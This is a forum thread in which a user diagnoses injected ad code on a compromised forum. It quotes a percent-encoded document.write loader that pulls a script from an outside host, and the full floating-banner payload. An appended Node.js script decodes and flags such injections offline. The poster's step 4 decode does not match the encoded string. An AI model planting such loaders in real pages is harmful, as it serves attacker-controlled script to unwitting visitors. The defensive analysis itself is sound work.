lbs007 posted at 2011-7-27 10:32

Forum infected; here is some information for the administrators' reference

This morning I opened a thread and saw a QQ prize-winning notice, so I suspect the site has had malicious code injected (挂马):   http://www.chuantu.info/tupianshangchuan/2/1311733353x-1376440113.jpg

1. So I right-clicked and checked the ad image's address: ais58[.]com/public/cache/backup/es.gif

2. I viewed the page source and found suspicious code in the header, between <head> and </head>, at line 17: <script src="forumdata/cache/common[.]js?WHH" type="text/javascript"></script>

3. Opening bbs[.]138[.]net/forumdata/cache/common[.]js?WHH, I found an encoded address at that location. The code is as follows:
document.write('<script src=hxxp://%77%77%77%2E%71%71%63%6F%6D%31%36%38%2E%63%6F%6D/%63%61%63%68%65/%63%73%73%2E%6A%73></script>')

4. Decoding hxxp://%77%77%77%2E%71%71%63%6F%6D%31%36%38%2E%63%6F%6D/%63%61%63%68%65/%63%73%73%2E%6A%73 gives the real address www[.]ais58[.]com/public/cache/backup/ajax.js

5. Opening www[.]ais58[.]com/public/cache/backup/ajax.js in the browser, I found the following code; this is exactly the injected ad code.

lbs007 posted at 2011-7-27 10:27

The forum is infected; here is some information for the administrators' reference.

This morning I opened a thread and saw a QQ prize-winning notice, so I suspect the site has had malicious code injected (挂马):   http://www.chuantu.info/tupianshangchuan/2/1311733353x-1376440113.jpg

1. So I right-clicked and checked the ad image's address: http://www.ais58.com/public/cache/backup/es.gif

2. I viewed the page source and found suspicious code in the header, between <head> and </head>, at line 17: <script src="forumdata/cache/common.js?WHH" type="text/javascript"></script>

3. Opening http://bbs.138.net/forumdata/cache/common.js?WHH, I found an encoded address at that location. The code is as follows:
document.write('<script src=http://%77%77%77%2E%71%71%63%6F%6D%31%36%38%2E%63%6F%6D/%63%61%63%68%65/%63%73%73%2E%6A%73></script>')

4. Decoding http://%77%77%77%2E%71%71%63%6F%6D%31%36%38%2E%63%6F%6D/%63%61%63%68%65/%63%73%73%2E%6A%73 gives the real address http://www.ais58.com/public/cache/backup/ajax.js

5. Opening http://www.ais58.com/public/cache/backup/ajax.js in the browser, I found the following code; this is exactly the injected ad code:


// Show the ad at most once per 6 hours per browser: do nothing if the "cookiesleep" cookie is already set
var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleep");
if(start!=-1){}else{
  var expires=new Date();
  expires.setTime(expires.getTime()+6*60*60*1000);
  document.cookie="cookiesleep=test;expires="+expires.toGMTString();
  // Banner image (es.gif) and a double percent-encoded landing URL on the same host
  var qq_etewidth = 254;
  var qq_eteheight = 156;
  var qq_banner_filename = "http://www.ais58.com/public/cache/backup/es.gif";
  var qq_gotoUrl = "http://www.ais58.com/pic/%2570%2565%2572%2568%2561%2570%2573/%2564%2569%2573%2563%256F%2576%2565%2572/%2563%256F%256E%2573%2569%2564%2565%2572/%2570%2569%2563%2574%2575%2572%2565/can.asp";
  // Inject an absolutely positioned div containing the linked banner
  document.write("<div id=eteUnionUpFloat style='margin:0px;padding-bottom:300px;z-index: 10;position:absolute;width:"+qq_etewidth+"px;height:"+qq_eteheight+"px;'>")
  document.write("<a href='"+qq_gotoUrl+"' target='_blank'><img src='"+qq_banner_filename+"' border='0' style='cursor: hand;' width='"+qq_etewidth+"' height='"+qq_eteheight+"'></a>")
  document.write("</div>")
  // Pin the div to the bottom-right corner of the viewport and keep it there while the page scrolls
  var bodyfrm = ( document.compatMode.toLowerCase()=="css1compat" ) ? document.documentElement : document.body;
  var adst = document.getElementById("eteUnionUpFloat").style;
  adst.top = ( bodyfrm.clientHeight - qq_eteheight ) + "px";
  adst.left = ( bodyfrm.clientWidth - qq_etewidth ) + "px";
  function moveR() {
    adst.top = ( bodyfrm.scrollTop + bodyfrm.clientHeight - qq_eteheight ) + "px";
    adst.left = ( bodyfrm.scrollLeft + bodyfrm.clientWidth - qq_etewidth ) + "px";
  }
  var objTimer=setInterval("moveR();", 100);
  // Close handlers: hide the div and stop the repositioning timer
  function CloseX(){
    adst.display='none';
  }
  function ete_closediv()
  {
    document.getElementById('eteUnionUpFloat').style.visibility='hidden';
    if(objTimer) window.clearInterval(objTimer)
  }
  // Play a sound through the IE-only BGSOUND element (ignored by Firefox)
  document.writeln("<BGSOUND balance=0 src=\"http://www.ais58.com/public/cache/backup/system.wav\" volume=-240>");
}
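The following is an added example, written here for both of lbs007's posts above; it is not code from the posts, from the forum or from the ad script. It embeds the three artifacts the posts quote (the script tag from step 2, the document.write line from step 3 and the qq_gotoUrl from the step 5 payload) as constants, extracts script src values from page HTML or from a document.write string, and percent-decodes them repeatedly, since a single decode turns %2570 into %70 rather than into the letter p. The <head> lines around the quoted tag are constructed filler, and bbs.138.net is taken from step 3 as the forum's own host. Decoding the string quoted in step 3 yields http://www.qqcom168.com/cache/css.js, an intermediate hop the posts do not name; the ajax.js payload quoted in step 5 is what points the banner, its link and the sound file at ais58.com.

```javascript
// Added example (not from the post): offline triage of the injected script chain.
// Runs under Node.js and never fetches any of the URLs it handles.

// Constructed <head> sample: the middle script tag is the one quoted in step 2;
// the other lines are assumed filler, not taken from the forum page.
const SAMPLE_HEAD = [
  '<head>',
  '<link rel="stylesheet" href="forumdata/cache/style_1_common.css" type="text/css">',
  '<script src="include/javascript/common.js" type="text/javascript"></script>',
  '<script src="forumdata/cache/common.js?WHH" type="text/javascript"></script>',
  '</head>'
].join('\n');

// Body of common.js?WHH exactly as quoted in step 3 of the post.
const COMMON_JS = "document.write('<script src=http://%77%77%77%2E%71%71%63%6F%6D%31%36%38%2E%63%6F%6D/%63%61%63%68%65/%63%73%73%2E%6A%73></script>')";

// qq_gotoUrl from the ajax.js payload in step 5 (double percent-encoded path).
const GOTO_URL = 'http://www.ais58.com/pic/%2570%2565%2572%2568%2561%2570%2573/%2564%2569%2573%2563%256F%2576%2565%2572/%2563%256F%256E%2573%2569%2564%2565%2572/%2570%2569%2563%2574%2575%2572%2565/can.asp';

// Percent-decode until the string stops changing, so nested layers
// (%2570 -> %70 -> p) unwrap completely. Bounded, and stops on malformed %xx.
function fullyDecode(s, maxRounds = 5) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Every src= value of a <script> tag, whether the tag sits in page HTML or in
// the string handed to document.write (quoted or bare attribute value).
function extractScriptSrcs(text) {
  const re = /<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const out = [];
  let m;
  while ((m = re.exec(text)) !== null) out.push(m[1] ?? m[2] ?? m[3]);
  return out;
}

// Hostname of an absolute http(s) URL, or null for a relative path.
function hostOf(url) {
  const m = /^https?:\/\/([^\/?#:]+)/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// For each script src: what it fully decodes to, and why it deserves a look.
// ownHost is the forum's own hostname (bbs.138.net in the post).
function triageScripts(text, ownHost) {
  return extractScriptSrcs(text).map(src => {
    const decoded = fullyDecode(src);
    const reasons = [];
    if (/%[0-9a-f]{2}/i.test(src)) reasons.push('percent-encoded src');
    const host = hostOf(decoded);
    if (host && host !== ownHost.toLowerCase()) reasons.push('third-party host ' + host);
    return { src, decoded, reasons };
  });
}

// A cached .js file whose content injects another <script> through
// document.write is the pattern seen in step 3; flag it without executing it.
function injectsRemoteScript(js) {
  return /document\.write(?:ln)?\s*\(\s*['"]\s*<script\b/i.test(js) && extractScriptSrcs(js).length > 0;
}

// Print the chain when run directly (node triage.js); harmless when imported.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(triageScripts(SAMPLE_HEAD, 'bbs.138.net'));
  console.log('common.js injects a remote script:', injectsRemoteScript(COMMON_JS));
  console.log(triageScripts(COMMON_JS, 'bbs.138.net'));
  console.log('landing page after full decode:', fullyDecode(GOTO_URL));
}
```

Run directly, the triage of the <head> sample returns no reasons for either tag: the injected include is indistinguishable from a normal one by its src alone, so the useful checks are on the file's content (injectsRemoteScript) and a hash comparison of everything under forumdata/cache/ against a clean copy of the forum. The full decode of qq_gotoUrl gives http://www.ais58.com/pic/perhaps/discover/consider/picture/can.asp. The payload's cookiesleep cookie, set with a 6-hour expiry, makes the banner appear at most once per 6 hours per browser, which is why different users of the same forum saw it inconsistently.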

斑竹 posted at 2011-7-30 23:04

Sorry, I've been run off my feet these past few days and only just saw this.

The last cleanup was in the early hours of the 30th; hopefully it's completely clean this time.

神の宠 posted at 2011-7-31 00:24

Using FF, I don't think I've ever seen any of these.